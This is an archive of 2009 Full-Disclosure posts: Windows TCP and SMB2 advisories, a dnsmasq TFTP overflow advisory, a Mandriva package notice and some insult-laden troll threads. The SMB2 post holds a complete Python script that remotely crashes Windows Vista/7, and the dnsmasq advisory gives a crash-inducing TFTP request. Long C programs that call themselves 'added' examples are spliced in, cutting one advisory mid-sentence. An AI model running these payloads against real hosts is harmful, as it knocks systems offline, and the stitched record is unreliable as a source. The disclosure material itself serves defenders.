concerning MS09-048 and in particular CVE-2009-1926, we would like to
publish the following advisory:

http://www.recurity-labs.com/content/pub/Microsoft_Windows_CVE-2009-1926_MS09-048.txt

regards,
Fabian fabs Yamaguchi, Recurity Labs GmbH



Recurity Labs GmbH
http://www.recurity-labs.com
entomol...@recurity-labs.com
Date: 09.09.2009


Vendor:Microsoft Corporation
Product:   Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity:  Moderate
CVE:   CVE-2009-1926


Vendor communication:
  
  09.12.2008  Initial notification sent to MSRC
  
  10.12.2008  Response from MSRC case manager - The report is
  being investigated.

  23.12.2008  Recurity Labs would like to know whether MSRC
  considers this a vulnerability. If not so, Recurity
  Labs would like to mention the issue in an upcoming
  talk on TCP Denial Of Service vulnerabilities at the
  25th Chaos Communication Congress (25C3).

  28.12.2008  Recurity Labs agrees not to mention the issue until
  MSRC has had a chance to classify it.

  09.01.2009  MSRC case manager asks for a copy of the
  presentation-slides.

  13.01.2009  Vulnerability is classified as a 'Moderate'
  DoS by MSRC.

  26.02.2009  Update on the issue by MSRC - A fix is scheduled for
  May or June.

  27.03.2009  Update on the issue by MSRC - The fix is still
  scheduled for June.

  08.05.2009  Update on the issue by MSRC - The fix is delayed to
  August.

  29.07.2009  Meeting the MSRC case manager at BlackHat USA and
  getting a t-shirt. Thanks, nice move.

  05.08.2009  Update on the issue by MSRC - The fix is ready but
  issues arose during testing. The release is rescheduled.

  09.09.2009  Microsoft releases MS09-048



Overview:
  
  The TCP/IP-Stack of the Microsoft Windows XP/Vista Operating System
  is vulnerable to a remote resource exhaustion vulnerability. By
  taking advantage of this vulnerability, an attacker can cause a
  connection's Transmission Control Block (TCB) to remain in memory for
  an indefinite amount of time without the need for the attacker to
  further maintain the connection's activity.
  
Description:

  The vulnerabilities exist in the implementation of TCP's flow-control
  mechanism, in particular due to incorrect handling of advertised
  zero windows. A zero window may be advertised by a TCP after a
  connection enters the ESTABLISHED state to indicate that it is
  currently not able to accept any data due to limited buffer space.
  If the peer TCP has pending data to deliver, it starts its
  persist timer, which periodically queries the value of the
  flow-control window by issuing so-called zero-window probes. These
  probes are TCP segments containing a single byte of payload, which
  force the receiver to generate an acknowledgment, which in turn
  lets the peer learn the current value of the flow-control window.
  As a side effect, the retransmission timer is disabled, because the
  persist and retransmission timers are mutually exclusive. The
  sending TCP is said to be in persist-state.

  In Windows XP and Windows Vista, connections in state FIN_WAIT_1 or
  FIN_WAIT_2 never terminate while the flow-control mechanism is in
  persist-state. This can be demonstrated as follows:

  1. The attacker establishes a TCP connection with the target.
  2. The attacker sends a specially crafted TCP segment to the
     target. The segment must fulfill the following criteria:

     a) The advertised flow-control window is set to zero.

     b) If the layer-5 application that owns the socket associated
        with this connection does not automatically send data to the
        attacker, the segment needs to cause the application to do so.

     c) To increase the attack speed, the segment data should cause
        the layer-5 application to terminate the connection as soon as
        possible. For example, if the layer-5 application is a
        web server, a GET request that references a non-existent
        resource is a good choice. When targeting the NetBIOS Session
        Manager (port 139), simply sending an invalid request such as
        'abc\n' is sufficient.

  3. Since the layer-5 application closes the socket associated with the
     connection in response to the attacker's request, the connection
     moves into state FIN_WAIT_1 and is now 
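The persist-state mechanism and the orphaned-TCB outcome described above, as an added C model that is not part of the Recurity advisory and not Microsoft's fix: a half-closed connection whose peer keeps answering zero-window probes with another zero window stays in FIN_WAIT_1 for as long as the simulation runs when nothing bounds persist time, while a cap on how long a half-closed connection may persist (an assumed mitigation shape, not the change MS09-048 actually made) reclaims the TCB. The timer constants, the tcb/policy layout and all function names are assumptions.

```c
/* Added model of the orphaned-connection condition from the advisory; not
 * Recurity's code and not Microsoft's fix. */
#include <stdio.h>

#define PERSIST_MIN 5.0     /* first persist-timer interval, seconds (classic BSD value) */
#define PERSIST_MAX 60.0    /* cap on the exponentially backed-off interval */
#define UNBOUNDED  (-1.0)   /* policy value: never reclaim (behaviour reported for XP/Vista) */

enum tcp_state { ESTABLISHED, FIN_WAIT_1, FIN_WAIT_2, CLOSED };

struct tcb {
    enum tcp_state state;
    unsigned peer_window;     /* window last advertised by the peer */
    unsigned unsent;          /* bytes queued that the peer has not accepted */
    unsigned persist_probes;  /* zero-window probes sent so far */
    double   persist_seconds; /* time spent in persist-state */
};

/* The application closes the socket: the FIN queues behind the unsent data
 * and the connection moves to FIN_WAIT_1 (step 3 of the advisory). */
void app_close(struct tcb *c)
{
    if (c->state == ESTABLISHED)
        c->state = FIN_WAIT_1;
}

int in_persist_state(const struct tcb *c)
{
    return c->state != CLOSED && c->peer_window == 0 && c->unsent > 0;
}

/* Half-closed: the application is gone but the TCB is still held. */
int is_orphaned(const struct tcb *c)
{
    return c->state == FIN_WAIT_1 || c->state == FIN_WAIT_2;
}

/* Advance 'duration' seconds while the peer answers every probe with another
 * zero window. Only the persist timer runs: the retransmission timer is off,
 * so nothing else can time the connection out. 'max_orphan_persist' is the
 * longest a half-closed connection may persist before its TCB is reclaimed;
 * UNBOUNDED disables that limit. Returns the number of probes sent. */
unsigned simulate_persist(struct tcb *c, double max_orphan_persist, double duration)
{
    double t = 0.0, backoff = PERSIST_MIN;
    while (in_persist_state(c) && t + backoff <= duration) {
        t += backoff;
        c->persist_probes++;            /* one-byte zero-window probe */
        c->persist_seconds = t;
        backoff = backoff * 2 < PERSIST_MAX ? backoff * 2 : PERSIST_MAX;
        if (is_orphaned(c) && max_orphan_persist >= 0 && t >= max_orphan_persist)
            c->state = CLOSED;          /* TCB released despite a silent peer */
    }
    return c->persist_probes;
}

/* Run one connection under a policy for a simulated day and return its final
 * state, so the two policies can be compared side by side. */
enum tcp_state run_orphan_scenario(double max_orphan_persist, struct tcb *out)
{
    /* constructed starting point: peer advertises window 0, 512 bytes queued */
    struct tcb c = { ESTABLISHED, 0, 512, 0, 0.0 };
    app_close(&c);
    simulate_persist(&c, max_orphan_persist, 24.0 * 3600.0);
    if (out)
        *out = c;
    return c.state;
}

int main(void)
{
    struct tcb a, b;
    run_orphan_scenario(UNBOUNDED, &a);
    run_orphan_scenario(120.0, &b);
    printf("unbounded: state=%d probes=%u\nbounded:   state=%d probes=%u\n",
           a.state, a.persist_probes, b.state, b.persist_probes);
    return 0;
}
```

Over a simulated day the unbounded connection sends 1442 probes and is still in FIN_WAIT_1, although the local side has sent nothing but one-byte probes since the close; that is the "remain in memory for an indefinite amount of time" condition from the overview. With a 120-second cap the TCB is released after the fifth probe. On a real host the symptom to watch for is a count of FIN_WAIT connections that keeps growing and never drains.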

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread randomguy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How come all I hear about is n3td3v, and I see no one crying out
loud about this:
http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

is fd all 'bout trolls nao?

- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=

I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- -
Windows Vista and newer Windows versions come with a new SMB version
named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends
to an SMB server, and it is used to identify the SMB dialect that
will be used for further communication.

IV. PROOF OF CONCEPT
- -

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB
# header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be
                   # "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
- -
An attacker can remotely crash, without any user interaction, any
Vista/Windows 7 machine with SMB enabled.
Windows XP and 2000 are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Windows Server 2008, as it uses the same SMB2.0 driver (not tested).

VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
- -
http://microsoft.com

IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-
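A decoder for the NEGOTIATE request shape the advisory's script sends, written as an added C example that is not part of the advisory or of Laurent Gaffié's script: it validates the NetBIOS and SMB1 framing before reading anything behind a length field, reports the header fields a network sensor would inspect, and flags the non-zero Process ID High value the advisory identifies as the trigger. The builder, struct and function names, and the 0x2600 value (the advisory's bytes 00 26 read little-endian) are my constructions.

```c
/* Added SMB1 NEGOTIATE decoder and check; not part of the advisory or its script. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define SMB_COM_NEGOTIATE 0x72
#define SMB_HDR_LEN 32

struct smb_negotiate {
    uint8_t  command, flags;
    uint16_t flags2, pid_high, tid, pid_low, uid, mid;
    int      dialect_count;
    int      offers_smb2;       /* 1 if "SMB 2.002" is among the dialects */
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parse a NetBIOS-framed SMB1 message. Returns 0 on success or a negative code
 * naming the check that failed; every length is validated before use. */
int parse_smb_negotiate(const uint8_t *pkt, size_t len, struct smb_negotiate *out)
{
    if (len < 4 + SMB_HDR_LEN + 3) return -1;      /* NBT + header + WordCount + ByteCount */
    if (pkt[0] != 0x00) return -2;                 /* not a session message */
    size_t nbt_len = ((size_t)pkt[1] << 16) | ((size_t)pkt[2] << 8) | pkt[3];
    const uint8_t *smb = pkt + 4;
    size_t smb_len = len - 4;
    if (nbt_len != smb_len) return -3;             /* NBT length disagrees with data */
    if (memcmp(smb, "\xffSMB", 4) != 0) return -4;

    memset(out, 0, sizeof *out);
    out->command  = smb[4];
    out->flags    = smb[9];
    out->flags2   = le16(smb + 10);
    out->pid_high = le16(smb + 12);                /* the field the advisory points at */
    out->tid      = le16(smb + 24);
    out->pid_low  = le16(smb + 26);
    out->uid      = le16(smb + 28);
    out->mid      = le16(smb + 30);

    size_t bc_off = 33 + 2 * (size_t)smb[32];      /* ByteCount follows WordCount words */
    if (smb_len < bc_off + 2) return -5;
    size_t byte_count = le16(smb + bc_off);
    const uint8_t *data = smb + bc_off + 2;
    if (smb_len - (bc_off + 2) != byte_count) return -6;

    if (out->command == SMB_COM_NEGOTIATE) {
        size_t i = 0;
        while (i < byte_count) {                   /* each dialect: 0x02, string, NUL */
            if (data[i] != 0x02) return -7;
            const uint8_t *nul = memchr(data + i + 1, 0, byte_count - i - 1);
            if (!nul) return -8;                   /* unterminated dialect string */
            size_t slen = (size_t)(nul - (data + i + 1));
            if (slen == 9 && memcmp(data + i + 1, "SMB 2.002", 9) == 0)
                out->offers_smb2 = 1;
            out->dialect_count++;
            i = (size_t)(nul - data) + 1;
        }
    }
    return 0;
}

/* The rule the advisory implies for a sensor: a NEGOTIATE with a non-zero
 * Process ID High is the malformed shape it describes. */
int negotiate_is_suspicious(const struct smb_negotiate *n)
{
    return n->command == SMB_COM_NEGOTIATE && n->pid_high != 0;
}

/* Build a NEGOTIATE request (constructed sample) with the given PIDHigh; the
 * other header fields copy the advisory's packet. Returns the total length,
 * or 0 if 'buf' is too small. */
size_t build_negotiate(uint8_t *buf, size_t bufsz, uint16_t pid_high,
                       const char *const *dialects, int n)
{
    static const uint8_t hdr[SMB_HDR_LEN] = {
        0xff, 'S', 'M', 'B', SMB_COM_NEGOTIATE, 0, 0, 0, 0, 0x18, 0x53, 0xc8,
        0, 0,                                        /* PIDHigh, set below */
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 0xff, 0xfe, 0, 0, 0, 0 };
    size_t body = 0;
    for (int i = 0; i < n; i++) body += strlen(dialects[i]) + 2;
    size_t smb_len = SMB_HDR_LEN + 3 + body;
    if (bufsz < 4 + smb_len) return 0;
    buf[0] = 0; buf[1] = (uint8_t)(smb_len >> 16);
    buf[2] = (uint8_t)(smb_len >> 8); buf[3] = (uint8_t)smb_len;
    uint8_t *p = buf + 4;
    memcpy(p, hdr, SMB_HDR_LEN);
    p[12] = (uint8_t)(pid_high & 0xff); p[13] = (uint8_t)(pid_high >> 8);
    p += SMB_HDR_LEN;
    *p++ = 0;                                        /* WordCount */
    *p++ = (uint8_t)(body & 0xff); *p++ = (uint8_t)(body >> 8);   /* ByteCount */
    for (int i = 0; i < n; i++) {
        size_t l = strlen(dialects[i]);
        *p++ = 0x02; memcpy(p, dialects[i], l); p += l; *p++ = 0;
    }
    return 4 + smb_len;
}
```

With the seven dialects from the advisory's packet the builder produces the same 148-byte layout (4-byte NBT header plus 0x90 bytes of SMB), which the parser accepts; truncating it by one byte fails the NBT length check before any header field is read, which is the order of checks a sensor wants so that a malformed frame never drives an out-of-bounds read in the decoder itself.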


Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread Valdis . Kletnieks
On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] 
said:
 I just go off the phone with intelligence

Congrats. I call Poe's Law on this - it's reached the point where it's
impossible to tell if it's really n3td3v under another alias, or a
sufficiently well-done parody.

:)



[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-09-09 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

 Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server


1. *Advisory Information*

Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958


3. *Vulnerability Description*

Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tftp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.

Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.


4. *Vulnerable packages*

   . dnsmasq 2.40.
   . dnsmasq 2.41.
   . dnsmasq 2.42.
   . dnsmasq 2.43.
   . dnsmasq 2.44.
   . dnsmasq 2.45.
   . dnsmasq 2.46.
   . dnsmasq 2.47.
   . dnsmasq 2.48.
   . dnsmasq 2.49.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . dnsmasq 2.50


6. *Vendor Information, Solutions and Workarounds*

If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.

Patches are already available from the software author. Most
distributions should release updates for binary packages soon.


7. *Credits*

The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team Los
Herederos de Don Pablo of Core Security Technologies.

The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for users' convenience.


8. *Technical Description*

8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*

First let's focus on the overflow vulnerability. The 'tftp_request'
function calls 'strncat' on 'daemon->namebuff', which has a predefined
size of 'MAXDNAME' bytes (defaulting to 1025).

/---
else if (filename[0] == '/')
   daemon->namebuff[0] = 0;
strncat(daemon->namebuff, filename, MAXDNAME);
- ---/

This may cause a heap overflow because 'daemon->namebuff' may already
contain data, namely the configured 'daemon->tftp_prefix' passed to the
daemon via a configuration file.

/---
if (daemon->tftp_prefix)
  {
    if (daemon->tftp_prefix[0] == '/')
      daemon->namebuff[0] = 0;
    strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME);
- ---/

The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.

Sending the string produced by the following Python snippet to a
vulnerable server, with a long enough directory prefix configured,
should crash the daemon.

/---
import sys
sys.stdout.write('\x00\x01' + 'A' * 1535 + '\x00' + 'netascii' + '\x00')
- ---/

8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*

Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem in the guard of the first if
inside this code loop:

/---
while ((opt = next(&p, end)))
  {
    if (strcasecmp(opt, "blksize") == 0 &&
        (opt = next(&p, end)) &&
        !(daemon->options & OPT_TFTP_NOBLOCK))
      {
        transfer->blocksize = atoi(opt);
        if (transfer->blocksize < 1)
          transfer->blocksize = 1;
        if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
          transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
        transfer->opt_blocksize = 1;
        transfer->block = 0;
      }

    if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
        !transfer->netascii)
      {
        transfer->opt_transize = 1;
        transfer->block = 0;
      }
  }
- ---/

The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard fails and in the next if 'strcasecmp(opt, "tsize")' will
dereference the null pointer.
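Both defects from sections 8.1 and 8.2 in one added C example, which is not dnsmasq's code and not Simon Kelley's fix: for 8.1 it computes the bytes a strncat bounded by the buffer size (instead of by the space left in it) would write, and shows a bounded append that refuses an oversized name; for 8.2 it rewrites the option loop so that the value read after 'blksize' never replaces 'opt', and treats a missing value as a malformed request. MAXDNAME and the default prefix come from the advisory; next_opt, append_name, build_tftp_path, parse_tftp_options and the sample inputs are assumptions.

```c
/* Added example (not dnsmasq's code): the two defect patterns from the
 * advisory, each beside a hardened form, exercised on constructed input. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>          /* strcasecmp */

#define MAXDNAME 1025         /* namebuff size quoted in the advisory */

/* 8.1 -- strncat(dst, src, n) appends up to n bytes of src AND a NUL, no
 * matter how much of dst is already in use. With n == MAXDNAME the call may
 * write strlen(dst) + MAXDNAME + 1 bytes into a MAXDNAME-byte buffer. This
 * returns the size the unsafe call needs, so the overflow can be checked
 * arithmetically instead of triggered. */
size_t unsafe_strncat_footprint(size_t dst_len, size_t src_len, size_t n)
{
    size_t copied = src_len < n ? src_len : n;
    return dst_len + copied + 1;          /* +1: the NUL strncat always adds */
}

/* Hardened append: the limit is the room left in dst, and a name that does
 * not fit is refused (return -1) instead of being silently truncated. */
int append_name(char *dst, size_t dst_size, const char *src)
{
    size_t used = strlen(dst);
    size_t room = dst_size - used - 1;    /* bytes free before the NUL */
    if (strlen(src) > room)
        return -1;
    strncat(dst, src, room);
    return 0;
}

/* Build "<prefix><filename>" the way the advisory's snippets do (a leading
 * '/' in the filename discards the prefix), but bounded. */
int build_tftp_path(char *out, size_t out_size, const char *prefix,
                    const char *filename)
{
    out[0] = '\0';
    if (prefix && append_name(out, out_size, prefix) != 0)
        return -1;
    if (filename[0] == '/')
        out[0] = '\0';
    return append_name(out, out_size, filename);
}

/* 8.2 -- stand-in for dnsmasq's next(): options are NUL-terminated strings
 * packed in [*p, end); returns NULL once exhausted or unterminated. */
static char *next_opt(char **p, char *end)
{
    char *start = *p;
    if (start >= end)
        return NULL;
    char *nul = memchr(start, '\0', (size_t)(end - start));
    if (!nul)
        return NULL;
    *p = nul + 1;
    return start;
}

struct tftp_opts { int blocksize; int opt_blocksize; int opt_tsize; };

/* Hardened option loop: the value read after "blksize" lives in its own
 * variable, so 'opt' is never NULL when the next comparison runs. A missing
 * value is a malformed request and is rejected (-1) rather than parsed. */
int parse_tftp_options(char *p, char *end, struct tftp_opts *o)
{
    char *opt;
    memset(o, 0, sizeof *o);
    while ((opt = next_opt(&p, end))) {
        if (strcasecmp(opt, "blksize") == 0) {
            char *val = next_opt(&p, end);
            if (!val)
                return -1;
            o->blocksize = atoi(val);
            if (o->blocksize < 1)
                o->blocksize = 1;
            o->opt_blocksize = 1;
        } else if (strcasecmp(opt, "tsize") == 0) {
            if (!next_opt(&p, end))
                return -1;
            o->opt_tsize = 1;
        }
    }
    return 0;
}

int main(void)
{
    char path[MAXDNAME];
    char longname[1536];                  /* constructed: 1535 'A's, like the advisory's string */
    memset(longname, 'A', 1535);
    longname[1535] = '\0';
    printf("unsafe strncat would need %zu bytes of %d\n",
           unsafe_strncat_footprint(strlen("/var/tftpd"), 1535, MAXDNAME), MAXDNAME);
    printf("bounded build of the same name: %d\n",
           build_tftp_path(path, sizeof path, "/var/tftpd", longname));
    return 0;
}
```

The arithmetic in unsafe_strncat_footprint also shows why the prefix only changes the size of the overflow rather than whether one occurs: strncat with n equal to the buffer size can write n plus one terminating byte, so even an empty namebuff is overrun by a single NUL, and every byte of prefix already present adds one more.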


9. *Report Timeline*

. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,

[Full-disclosure] [ MDVSA-2009:226 ] aria2

2009-09-09 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:226
 http://www.mandriva.com/security/
 ___

 Package : aria2
 Date: September 9, 2009
 Affected: 2009.0, 2009.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in aria2:
 
 aria2 has a buffer overflow which makes it crash at least on mips.
 
 This update provides a solution to this vulnerability.
 ___

 References:

 https://qa.mandriva.com/52840
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 aca5d2cf89e66c2ce9571a92d4422fdd  
2009.0/i586/aria2-0.15.3-0.20080918.3.1mdv2009.0.i586.rpm 
 426570e80bfb4500ddfb6b614ce00b1d  
2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 3ffda03aa513f64aae44c753723b6057  
2009.0/x86_64/aria2-0.15.3-0.20080918.3.1mdv2009.0.x86_64.rpm 
 426570e80bfb4500ddfb6b614ce00b1d  
2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 ad69905c7c6705df5e6a45c74bffef2e  
2009.1/i586/aria2-1.2.0-0.20090201.3.1mdv2009.1.i586.rpm 
 50e2057ebaac0901d19ca7feb8063e53  
2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 4b5529526d974780f65a7036424b8aa5  
2009.1/x86_64/aria2-1.2.0-0.20090201.3.1mdv2009.1.x86_64.rpm 
 50e2057ebaac0901d19ca7feb8063e53  
2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm

 Mandriva Enterprise Server 5:
 3d6e5be8530d12ffd36e9e643a4e4538  
mes5/i586/aria2-0.15.3-0.20080918.3.1mdvmes5.i586.rpm 
 5ffa73ba78d44cf0c61dda3042e23d00  
mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 bc874285d1ded702bded3e04767e9aa6  
mes5/x86_64/aria2-0.15.3-0.20080918.3.1mdvmes5.x86_64.rpm 
 5ffa73ba78d44cf0c61dda3042e23d00  
mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKp7sWmqjQ0CJFipgRAnWVAJ9NTr/fWkV54mK2oW+YPvIP9cL3ZwCcCDm9
LSL0lhYX2+XU0QijJNzojuo=
=SGvN
-END PGP SIGNATURE-



Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread mrx


valdis.kletni...@vt.edu wrote:
 On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] 
 said:
   
 I just go off the phone with intelligence
 

 Congrats. I call Poe's Law on this - it's reached the point where it's
 impossible to tell if it's really n3td3v under another alias, or a
 sufficiently well-done parody.

 :)
   

Does anybody care?

In fact does anybody who contributes anything useful to this list use
Hushmail? (at this time I am too lazy to look). If not I can set my spam
filter. Amusing as it has been, it has grown tiresome.

btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least
that's what your wife  and sister tell me ;-)

I am a noob with skills marginally better (debatable) than the average
spotty first line support analyst. Therefore constructive criticism is
welcomed, anything else is ignored unless I am bored or stupid enough to
read/respond to these postings after a bottle of Shiraz.

regards
the learner aka
MrX

ps I wish I didn't have so much to learn.



Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread randomguy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hey, buddy, you know spam filters sometimes can be stupid.
Don't implement a stupid filter in your head.
Just because I mention a troll in my email, have a hushmail
address, and post a link you assume I must be rickrolling you or
something?

I was really surprised when I heard that Gaffie's remote DoS could
in fact be remote code exec. Not a mention here, unless I missed
something.

That's the link I posted, and since I don't understand shit to asm,
I was expecting some feedback.

BTW, this is not a flame, but since you assumed I was trolling, I
just wanted to make clear I was providing info, and waiting for
feedback on it.



PS : I use hush as disposable addresses, and it's none of your
business. And I don't mind my sister sleeping around, she's just a
whore anyway.

- --
[...snipped...]
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0
wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/
u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6
qBRkqZE=
=ymH2
-END PGP SIGNATURE-



[Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread TheLearner
I basically got no friends left. Every last friend I have this 
local detective has pegged every last buddy I have. I'm stuck in my 
house with nobody to turn to..

If you ever had detectives contact all your friends over the past 2 
years trying to get them to inform on you and set you up as a 
hacker or cyberbully... What would you do?

1.) Hire lawyer + private eye to disclose the identity of the 
detective ruining your life, possibly file a law suit?
2.) Move.
3.) 

What would you do?

Please help. This guy is just shutting my life down.

PS They got nothing on me. I've broken no law. I'll never be 
arrested because 1.) I did nothing 2.) I won't do anything, and 
